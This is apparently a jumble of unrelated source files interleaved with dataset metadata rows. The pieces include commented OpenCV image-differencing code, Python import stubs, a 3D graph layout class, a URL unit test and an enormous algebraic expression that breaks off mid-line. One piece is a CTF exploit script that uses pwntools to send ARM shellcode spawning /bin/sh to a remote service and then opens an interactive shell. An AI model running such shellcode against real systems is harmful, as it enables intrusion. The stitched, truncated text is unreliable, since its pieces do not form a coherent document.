# ret,diff_tresh = cv2.threshold(diff_gray_blur,diff_low_t,diff_high_t,cv2.THRESH_BINARY)
# self.previewImage('a', diff_tresh)
# diff = cv2.GaussianBlur(diff_tresh,(5,5),0)
# self.previewImage('a', diff)
# contours, hierarchy = cv2.findContours(diff, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# # 1s
# bg_low_t=255
# bg_high_t=255
# img_low_t=60
# img_high_t=255
# background_img_gray=cv2.cvtColor(anh_nen_crop, cv2.COLOR_BGR2GRAY)
# self.previewImage("1 Background Gray",background_img_gray)
# background_img_blur = cv2.GaussianBlur(background_img_gray,(5,5),0)
# self.previewImage("2 Background Blur Gray",background_img_blur)
# ret,background_img_tresh = cv2.threshold(background_img_blur,bg_low_t,bg_high_t,cv2.THRESH_BINARY_INV)
# self.previewImage("3 Background Treshold",background_img_tresh)
# img_gray=cv2.cvtColor(anh_phat_hien_crop, cv2.COLOR_BGR2GRAY)
# self.previewImage("4 Image Gray",img_gray)
# img_blur = cv2.GaussianBlur(img_gray,(5,5),0)
# self.previewImage("5 Image Blur Gray",img_blur)
# ret,img_tresh = cv2.threshold(img_blur,img_low_t,img_high_t,cv2.THRESH_BINARY_INV)
# self.previewImage("6 Image Treshold",img_tresh)
# diff=cv2.absdiff(background_img_tresh,img_tresh)
# self.previewImage("7 Diff",diff)
# contours, hierarchy = cv2.findContours(diff, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# # 1.3s
# blur_bg = cv2.GaussianBlur(anh_nen_crop, (21, 21), 0)
# blur_target = cv2.GaussianBlur(anh_phat_hien_crop, (21, 21), 0)
# self.previewImage('anh_mo', blur_bg)
# self.previewImage('anh_phat_hien_mo', blur_target)
# gray_target = cv2.cvtColor(blur_target,cv2.COLOR_BGR2GRAY)
# gray_bg = cv2.cvtColor(blur_bg,cv2.COLOR_BGR2GRAY)
# frameDelta = cv2.absdiff(blur_bg,blur_target)
# self.previewImage('khac_biet', frameDelta)
# gray_result = cv2.cvtColor(frameDelta, cv2.COLOR_BGR2GRAY)
# self.previewImage('den_trang', gray_result)
# _, threshold = cv2.threshold(gray_result, 40, 255, cv2.THRESH_BINARY)
# thresh = cv2.dilate(threshold, None, iterations=2)
# self.previewImage('contour', thresh)
# contours,_ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# 1s or less
# diff_low_t=35
# diff_high_t=255
# target_gray = cv2.cvtColor(crop_phat_hien, cv2.COLOR_BGR2GRAY)
# previewImage('a', target_gray)
# bg_gray = cv2.cvtColor(crop_nen, cv2.COLOR_BGR2GRAY)
# previewImage('a', bg_gray)
# diff_gray = cv2.absdiff(target_gray,bg_gray)
# previewImage('a', diff_gray)
# diff_gray_blur = cv2.GaussianBlur(diff_gray,(5,5),0)
# previewImage('a', diff_gray_blur)
# ret,diff_tresh = cv2.threshold(diff_gray_blur,diff_low_t,diff_high_t,cv2.THRESH_BINARY)
# previewImage('a', diff_tresh)
# diff = cv2.GaussianBlur(diff_tresh,(5,5),0)
# previewImage('a', diff)
# contours, hierarchy = cv2.findContours(diff, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
# # contours, hierarchy = cv2.findContours(diff, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# 1s
# bg_low_t=255
# bg_high_t=255
# img_low_t=60
# img_high_t=255
# background_img_gray=cv2.cvtColor(crop_nen , cv2.COLOR_BGR2GRAY)
# previewImage("1 Background Gray",background_img_gray)
# background_img_blur = cv2.GaussianBlur(background_img_gray,(5,5),0)
# previewImage("2 Background Blur Gray",background_img_blur)
# ret,background_img_tresh = cv2.threshold(background_img_blur,bg_low_t,bg_high_t,cv2.THRESH_BINARY_INV)
# previewImage("3 Background Treshold",background_img_tresh)
# img_gray=cv2.cvtColor(crop_phat_hien, cv2.COLOR_BGR2GRAY)
# previewImage("4 Image Gray",img_gray)
# img_blur = cv2.GaussianBlur(img_gray,(5,5),0)
# previewImage("5 Image Blur Gray",img_blur)
# ret,img_tresh = cv2.threshold(img_blur,img_low_t,img_high_t,cv2.THRESH_BINARY_INV)
# previewImage("6 Image Treshold",img_tresh)
# diff=cv2.absdiff(background_img_tresh,img_tresh)
# previewImage("7 Diff",diff)
# contours, hierarchy = cv2.findContours(diff, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
# 1.3s
# blur_bg = cv2.GaussianBlur(crop_nen, (21, 21), 0)
# blur_target = cv2.GaussianBlur(crop_phat_hien, (21, 21), 0)
# previewImage('anh_mo', blur_bg)
# previewImage('anh_phat_hien_mo', blur_target)
# gray_target = cv2.cvtColor(blur_target,cv2.COLOR_BGR2GRAY)
# gray_bg = cv2.cvtColor(blur_bg,cv2.COLOR_BGR2GRAY)
# frameDelta = cv2.absdiff(blur_bg,blur_target)
# previewImage('khac_biet', frameDelta)
# gray_result = cv2.cvtColor(frameDelta, cv2.COLOR_BGR2GRAY)
# previewImage('den_trang', gray_result)
# _, threshold = cv2.threshold(gray_result, 40, 255, cv2.THRESH_BINARY)
# thresh = cv2.dilate(threshold, None, iterations=2)
# previewImage('contour', thresh)
# contours,_ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
| 39.738806
| 105
| 0.739906
| 788
| 5,325
| 4.681472
| 0.091371
| 0.07807
| 0.060721
| 0.037951
| 0.97723
| 0.962591
| 0.962591
| 0.94199
| 0.932773
| 0.916237
| 0
| 0.045759
| 0.129953
| 5,325
| 134
| 106
| 39.738806
| 0.750486
| 0.912864
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
948c51a54bf9372de987684448ea44f76f76f67c
| 722
|
py
|
Python
|
2018/CrossCTF_2018/Finals/Pwn/FTLOG/soln_ftlong.py
|
solomonbstoner/solomonbston3r-ctf-diary
|
2eb5439b157ca0c97db313c9762c6b5d8a714a85
|
[
"Unlicense"
] | 14
|
2018-04-01T00:52:42.000Z
|
2020-07-11T06:17:49.000Z
|
2018/CrossCTF_2018/Finals/Pwn/FTLOG/soln_ftlong.py
|
solomonbstoner/solomonbston3r-ctf-diary
|
2eb5439b157ca0c97db313c9762c6b5d8a714a85
|
[
"Unlicense"
] | 5
|
2018-04-03T00:40:58.000Z
|
2021-06-02T13:37:43.000Z
|
2018/CrossCTF_2018/Finals/Pwn/FTLOG/soln_ftlong.py
|
solomonbstoner/solomonbston3r-ctf-diary
|
2eb5439b157ca0c97db313c9762c6b5d8a714a85
|
[
"Unlicense"
] | null | null | null |
from pwn import *
r = remote('ctf.pwn.sg', 4004)
#r = process('./ftlog')
exploit = '\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0a\x30\x01\x90\x01\xa9\x92\x1a\x0b\x27\x01\xdf\x2f\x2f\x62\x69\x6e\x2f\x73\x68'
# exploit did not work
exploit2 = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68'
#exploit2 did not work
exploit3 = '\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68'
#exploit 3 somehow worked. Taken from https://www.exploit-db.com/exploits/43520/
print r.recv(1000000)
r.sendline(exploit3)
r.interactive()
| 32.818182
| 169
| 0.721607
| 148
| 722
| 3.52027
| 0.412162
| 0.126679
| 0.172745
| 0.207294
| 0.43762
| 0.43762
| 0.43762
| 0.241843
| 0.241843
| 0.241843
| 0
| 0.269345
| 0.069252
| 722
| 21
| 170
| 34.380952
| 0.505952
| 0.198061
| 0
| 0
| 0
| 0.375
| 0.733913
| 0.716522
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.125
| null | null | 0.125
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84b1fa1b9a4d979dee785354836c06b02ef95339
| 206
|
py
|
Python
|
aioelasticsearch/exceptions.py
|
sloev/aioelasticsearch
|
26fcd7cce748f40cbd0833f49f399a2b5f08bb2e
|
[
"MIT"
] | 123
|
2018-01-23T02:45:07.000Z
|
2022-03-28T10:09:15.000Z
|
aioelasticsearch/exceptions.py
|
sloev/aioelasticsearch
|
26fcd7cce748f40cbd0833f49f399a2b5f08bb2e
|
[
"MIT"
] | 231
|
2018-01-19T00:34:35.000Z
|
2022-01-31T13:18:27.000Z
|
aioelasticsearch/exceptions.py
|
sloev/aioelasticsearch
|
26fcd7cce748f40cbd0833f49f399a2b5f08bb2e
|
[
"MIT"
] | 39
|
2018-04-01T03:11:03.000Z
|
2022-03-27T19:32:08.000Z
|
from elasticsearch.exceptions import * # noqa # isort:skip
from elasticsearch.exceptions import (AuthenticationException, # noqa # isort:skip
AuthorizationException)
| 51.5
| 83
| 0.665049
| 16
| 206
| 8.5625
| 0.5625
| 0.248175
| 0.394161
| 0.481752
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.276699
| 206
| 3
| 84
| 68.666667
| 0.919463
| 0.160194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
84dfb48247d0254a6b9a97f204163f64a413bccc
| 165
|
py
|
Python
|
loldib/getratings/models/NA/na_lissandra/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_lissandra/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_lissandra/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_lissandra_top import *
from .na_lissandra_jng import *
from .na_lissandra_mid import *
from .na_lissandra_bot import *
from .na_lissandra_sup import *
| 27.5
| 32
| 0.787879
| 25
| 165
| 4.8
| 0.36
| 0.25
| 0.625
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 165
| 5
| 33
| 33
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
84fe2a1856cfe378d66acbb424f70323104c05b1
| 5,782
|
py
|
Python
|
viz/layout.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | null | null | null |
viz/layout.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | 11
|
2020-11-13T18:29:37.000Z
|
2022-02-10T00:25:15.000Z
|
viz/layout.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | null | null | null |
import numpy as np
class Layout:
@staticmethod
def get_volcano_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_xy_location(node_layer_map, pos):
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
z_loc = pos[2]
layer = node_layer_map[node]
radius = layer / num_layers
x_loc = np.random.uniform(-radius, radius)
y_loc = [-1, 1][np.random.randint(2)] * np.sqrt(radius ** 2 - x_loc ** 2)
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
new_pos = relocate_xy_location(node_layer_map, new_pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
@staticmethod
def get_cylinder_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_xy_location(pos):
new_pos = {}
for node, pos in pos.items():
z_loc = pos[2]
radius = 1
x_loc = np.random.uniform(-radius, radius)
y_loc = [-1, 1][np.random.randint(2)] * np.sqrt(radius ** 2 - x_loc ** 2)
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
new_pos = relocate_xy_location(new_pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
@staticmethod
def get_tree_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
@staticmethod
def get_tree_centralized_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_xy_location(pos, margin=0.1):
new_pos = {}
for node, pos in pos.items():
weight = digraph.nodes[node]['frequency']
z_loc = pos[2]
radius = 1/weight + margin
x_loc = np.random.uniform(-radius, radius)
y_loc = np.random.uniform(-radius, radius)
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
new_pos = relocate_xy_location(new_pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
@staticmethod
def get_word2vector_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_xy_location(node_layer_map, pos):
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
z_loc = pos[2]
layer = node_layer_map[node]
radius = layer / num_layers
x_loc = np.random.uniform(-radius, radius)
y_loc = [-1, 1][np.random.randint(2)] * np.sqrt(radius ** 2 - x_loc ** 2)
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
new_pos = relocate_xy_location(node_layer_map, new_pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
| 40.152778
| 89
| 0.556382
| 773
| 5,782
| 3.826649
| 0.06727
| 0.091278
| 0.133874
| 0.086207
| 0.955375
| 0.955375
| 0.93881
| 0.93881
| 0.927992
| 0.91616
| 0
| 0.01216
| 0.345728
| 5,782
| 143
| 90
| 40.433566
| 0.769759
| 0
| 0
| 0.897638
| 0
| 0
| 0.00588
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.149606
| false
| 0
| 0.007874
| 0
| 0.314961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca76eaa4ce16f8855af3ee54c6d3109278f007be
| 939
|
py
|
Python
|
tests/test_get_url_from_args.py
|
psass-edfsf/centralized-pre-commit-conf
|
49ae2cf524dc90f55dfffc2c38ece3e1a2365c5f
|
[
"MIT"
] | 6
|
2020-05-25T07:11:53.000Z
|
2021-02-03T01:53:14.000Z
|
tests/test_get_url_from_args.py
|
psass-edfsf/centralized-pre-commit-conf
|
49ae2cf524dc90f55dfffc2c38ece3e1a2365c5f
|
[
"MIT"
] | 1
|
2020-09-02T15:51:38.000Z
|
2020-09-02T15:51:38.000Z
|
tests/test_get_url_from_args.py
|
psass-edfsf/centralized-pre-commit-conf
|
49ae2cf524dc90f55dfffc2c38ece3e1a2365c5f
|
[
"MIT"
] | 1
|
2020-07-22T08:03:45.000Z
|
2020-07-22T08:03:45.000Z
|
import unittest
from centralized_pre_commit_conf.parse_args import get_url_from_args
class TestGetUrlFromArgs(unittest.TestCase):
def test_all_args(self):
self.assertEqual(get_url_from_args("http://a.net", "master", "path"), "http://a.net/master/path")
self.assertEqual(get_url_from_args("http://a.net/", "master", "path"), "http://a.net/master/path")
self.assertEqual(get_url_from_args("http://a.net", "master", "path/"), "http://a.net/master/path")
self.assertEqual(get_url_from_args("http://a.net", "master", ""), "http://a.net/master")
self.assertEqual(get_url_from_args("http://a.net", "master", "/"), "http://a.net/master")
self.assertEqual(get_url_from_args("http://a.net", "", ""), "http://a.net")
self.assertEqual(get_url_from_args("http://a.net", "", "/"), "http://a.net")
self.assertEqual(get_url_from_args("http://a.net", "", "path"), "http://a.net/path")
| 58.6875
| 106
| 0.652822
| 137
| 939
| 4.233577
| 0.175182
| 0.137931
| 0.22069
| 0.241379
| 0.751724
| 0.751724
| 0.751724
| 0.751724
| 0.751724
| 0.751724
| 0
| 0
| 0.120341
| 939
| 15
| 107
| 62.6
| 0.702179
| 0
| 0
| 0
| 0
| 0
| 0.316294
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0.083333
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0468d7060893aed31e9b99d015c9235a59e51d6d
| 12,969
|
py
|
Python
|
utils.py
|
cculha4/pahoehoe2aa
|
a9c803f2aaa9604ad17b00fd8529f55cd68e4ff6
|
[
"MIT"
] | null | null | null |
utils.py
|
cculha4/pahoehoe2aa
|
a9c803f2aaa9604ad17b00fd8529f55cd68e4ff6
|
[
"MIT"
] | null | null | null |
utils.py
|
cculha4/pahoehoe2aa
|
a9c803f2aaa9604ad17b00fd8529f55cd68e4ff6
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
import matplotlib.pyplot as plt
import math
from itertools import cycle
"""
Taken from Matlab function solutions that can be found within the 'Free Slip LSA' directory.
"""
def no_slip_J(**params):
Ku_p, n, mu_u, m, U_p, n, du, F, r, Kl_p, m, mu_l = \
(params["Ku_p"], params["n"], params["mu_u"], params["m"], params["U_p"],
params["n"], params["du"], params["F"], params["r"], params["Kl_p"],
params["m"], params["mu_l"])
return -(560*F**2*U_p**2*mu_l**2*mu_u**2*n**14 + 56*Kl_p**2*du**4*m**4*mu_u**2*n**8 + 28*Kl_p**2*du**4*m**5*mu_u**2*n**7 + 7*Kl_p**2*du**4*m**6*mu_u**2*n**6 + 56*Kl_p**2*du**4*m**3*mu_u**2*n**10 + 252*Kl_p**2*du**4*m**4*mu_u**2*n**9 + 84*Kl_p**2*du**4*m**5*mu_u**2*n**8 - 7*Kl_p**2*du**4*m**7*mu_u**2*n**6 - 672*Kl_p**2*du**4*m**2*mu_u**2*n**12 - 1372*Kl_p**2*du**4*m**3*mu_u**2*n**11 - 854*Kl_p**2*du**4*m**4*mu_u**2*n**10 - 336*Kl_p**2*du**4*m**5*mu_u**2*n**9 - 140*Kl_p**2*du**4*m**6*mu_u**2*n**8 - 28*Kl_p**2*du**4*m**7*mu_u**2*n**7 - 1372*Kl_p**2*du**4*m**2*mu_u**2*n**13 - 1988*Kl_p**2*du**4*m**3*mu_u**2*n**12 - 224*Kl_p**2*du**4*m**4*mu_u**2*n**11 + 686*Kl_p**2*du**4*m**5*mu_u**2*n**10 + 84*Kl_p**2*du**4*m**6*mu_u**2*n**9 - 945*Kl_p**2*du**4*m**2*mu_u**2*n**14 - 336*Kl_p**2*du**4*m**3*mu_u**2*n**13 + 1708*Kl_p**2*du**4*m**4*mu_u**2*n**12 + 1596*Kl_p**2*du**4*m**5*mu_u**2*n**11 + 112*Kl_p**2*du**4*m**6*mu_u**2*n**10 - 224*Kl_p**2*du**4*m**2*mu_u**2*n**15 + 553*Kl_p**2*du**4*m**3*mu_u**2*n**14 + 1484*Kl_p**2*du**4*m**4*mu_u**2*n**13 + 952*Kl_p**2*du**4*m**5*mu_u**2*n**12 + 224*Kl_p**2*du**4*m**3*mu_u**2*n**15 + 392*Kl_p**2*du**4*m**4*mu_u**2*n**14 + 224*Kl_p**2*du**4*m**5*mu_u**2*n**13 + 32*Ku_p**2*du**4*m**4*mu_l**2*n**4 - 2*Ku_p**2*du**4*m**5*mu_l**2*n**3 + Ku_p**2*du**4*m**6*mu_l**2*n**2 + 72*Ku_p**2*du**4*m**3*mu_l**2*n**6 + 148*Ku_p**2*du**4*m**4*mu_l**2*n**5 - 34*Ku_p**2*du**4*m**5*mu_l**2*n**4 + 8*Ku_p**2*du**4*m**6*mu_l**2*n**3 - Ku_p**2*du**4*m**7*mu_l**2*n**2 - 216*Ku_p**2*du**4*m**2*mu_l**2*n**8 - 192*Ku_p**2*du**4*m**3*mu_l**2*n**7 - 154*Ku_p**2*du**4*m**4*mu_l**2*n**6 - 240*Ku_p**2*du**4*m**5*mu_l**2*n**5 + 2*Ku_p**2*du**4*m**6*mu_l**2*n**4 - 6*Ku_p**2*du**4*m**7*mu_l**2*n**3 - 292*Ku_p**2*du**4*m**2*mu_l**2*n**9 + 64*Ku_p**2*du**4*m**3*mu_l**2*n**8 + 48*Ku_p**2*du**4*m**4*mu_l**2*n**7 - 6*Ku_p**2*du**4*m**5*mu_l**2*n**6 + 92*Ku_p**2*du**4*m**6*mu_l**2*n**5 + 361*Ku_p**2*du**4*m**2*mu_l**2*n**10 + 1040*Ku_p**2*du**4*m**3*mu_l**2*n**9 + 464*Ku_p**2*du**4*m**4*mu_l**2*n**8 + 144*Ku_p**2*du**4*m**5*mu_l**2*n**7 + 88*Ku_p**2*du**4*m**6*mu_l**2*n**6 + 264*Ku_p**2*du**4*m**2*mu_l**2*n**11 + 199*Ku_p**2*du**4*m**3*mu_l**2*n**10 - 524*Ku_p**2*du**4*m**4*mu_l**2*n**9 - 312*Ku_p**2*du**4*m**5*mu_l**2*n**8 - 98*Ku_p**2*du**4*m**2*mu_l**2*n**12 - 378*Ku_p**2*du**4*m**3*mu_l**2*n**11 - 560*Ku_p**2*du**4*m**4*mu_l**2*n**10 - 224*Ku_p**2*du**4*m**5*mu_l**2*n**9 + 114*Ku_p**2*du**4*m*mu_l**2*n**11 + 98*Ku_p**2*du**4*m*mu_l**2*n**12 - 6*Kl_p**2*du**4*mu_u**2*n**17*r - Kl_p**2*du**4*mu_u**2*n**18*r - 28*Ku_p**2*du**4*mu_l**2*n**13*r - 7*Ku_p**2*du**4*mu_l**2*n**14*r + 88*Kl_p**2*du**4*m*mu_u**2*n**14*r + 92*Kl_p**2*du**4*m*mu_u**2*n**15*r + 2*Kl_p**2*du**4*m*mu_u**2*n**16*r + 8*Kl_p**2*du**4*m*mu_u**2*n**17*r + Kl_p**2*du**4*m*mu_u**2*n**18*r + 112*Ku_p**2*du**4*m*mu_l**2*n**10*r + 84*Ku_p**2*du**4*m*mu_l**2*n**11*r - 140*Ku_p**2*du**4*m*mu_l**2*n**12*r + 7*Ku_p**2*du**4*m*mu_l**2*n**14*r + 4480*F**2*U_p**2*m*mu_l**2*mu_u**2*n**11 + 6720*F**2*U_p**2*m*mu_l**2*mu_u**2*n**12 + 6160*F**2*U_p**2*m*mu_l**2*mu_u**2*n**13 - 224*Kl_p**2*du**4*m**2*mu_u**2*n**11*r - 560*Kl_p**2*du**4*m**3*mu_u**2*n**10*r - 378*Kl_p**2*du**4*m**4*mu_u**2*n**9*r - 98*Kl_p**2*du**4*m**5*mu_u**2*n**8*r - 312*Kl_p**2*du**4*m**2*mu_u**2*n**12*r - 524*Kl_p**2*du**4*m**3*mu_u**2*n**11*r + 199*Kl_p**2*du**4*m**4*mu_u**2*n**10*r + 264*Kl_p**2*du**4*m**5*mu_u**2*n**9*r + 98*Kl_p**2*du**4*m**6*mu_u**2*n**8*r + 144*Kl_p**2*du**4*m**2*mu_u**2*n**13*r + 464*Kl_p**2*du**4*m**3*mu_u**2*n**12*r + 1040*Kl_p**2*du**4*m**4*mu_u**2*n**11*r + 361*Kl_p**2*du**4*m**5*mu_u**2*n**10*r + 114*Kl_p**2*du**4*m**6*mu_u**2*n**9*r - 6*Kl_p**2*du**4*m**2*mu_u**2*n**14*r + 48*Kl_p**2*du**4*m**3*mu_u**2*n**13*r + 64*Kl_p**2*du**4*m**4*mu_u**2*n**12*r - 292*Kl_p**2*du**4*m**5*mu_u**2*n**11*r - 240*Kl_p**2*du**4*m**2*mu_u**2*n**15*r - 154*Kl_p**2*du**4*m**3*mu_u**2*n**14*r - 192*Kl_p**2*du**4*m**4*mu_u**2*n**13*r - 216*Kl_p**2*du**4*m**5*mu_u**2*n**12*r - 34*Kl_p**2*du**4*m**2*mu_u**2*n**16*r + 148*Kl_p**2*du**4*m**3*mu_u**2*n**15*r + 72*Kl_p**2*du**4*m**4*mu_u**2*n**14*r - 2*Kl_p**2*du**4*m**2*mu_u**2*n**17*r + 32*Kl_p**2*du**4*m**3*mu_u**2*n**16*r + 224*Ku_p**2*du**4*m**2*mu_l**2*n**7*r + 392*Ku_p**2*du**4*m**3*mu_l**2*n**6*r + 224*Ku_p**2*du**4*m**4*mu_l**2*n**5*r + 952*Ku_p**2*du**4*m**2*mu_l**2*n**8*r + 1484*Ku_p**2*du**4*m**3*mu_l**2*n**7*r + 553*Ku_p**2*du**4*m**4*mu_l**2*n**6*r - 224*Ku_p**2*du**4*m**5*mu_l**2*n**5*r + 1596*Ku_p**2*du**4*m**2*mu_l**2*n**9*r + 1708*Ku_p**2*du**4*m**3*mu_l**2*n**8*r - 336*Ku_p**2*du**4*m**4*mu_l**2*n**7*r - 945*Ku_p**2*du**4*m**5*mu_l**2*n**6*r + 686*Ku_p**2*du**4*m**2*mu_l**2*n**10*r - 224*Ku_p**2*du**4*m**3*mu_l**2*n**9*r - 1988*Ku_p**2*du**4*m**4*mu_l**2*n**8*r - 1372*Ku_p**2*du**4*m**5*mu_l**2*n**7*r - 336*Ku_p**2*du**4*m**2*mu_l**2*n**11*r - 854*Ku_p**2*du**4*m**3*mu_l**2*n**10*r - 1372*Ku_p**2*du**4*m**4*mu_l**2*n**9*r - 672*Ku_p**2*du**4*m**5*mu_l**2*n**8*r + 84*Ku_p**2*du**4*m**2*mu_l**2*n**12*r + 252*Ku_p**2*du**4*m**3*mu_l**2*n**11*r + 56*Ku_p**2*du**4*m**4*mu_l**2*n**10*r + 28*Ku_p**2*du**4*m**2*mu_l**2*n**13*r + 56*Ku_p**2*du**4*m**3*mu_l**2*n**12*r + 8960*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**8 + 31360*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**7 + 40880*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**6 + 24080*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**5 + 6160*F**2*U_p**2*m**6*mu_l**2*mu_u**2*n**4 + 560*F**2*U_p**2*m**7*mu_l**2*mu_u**2*n**3 + 26880*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**9 + 87360*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**8 + 100800*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**7 + 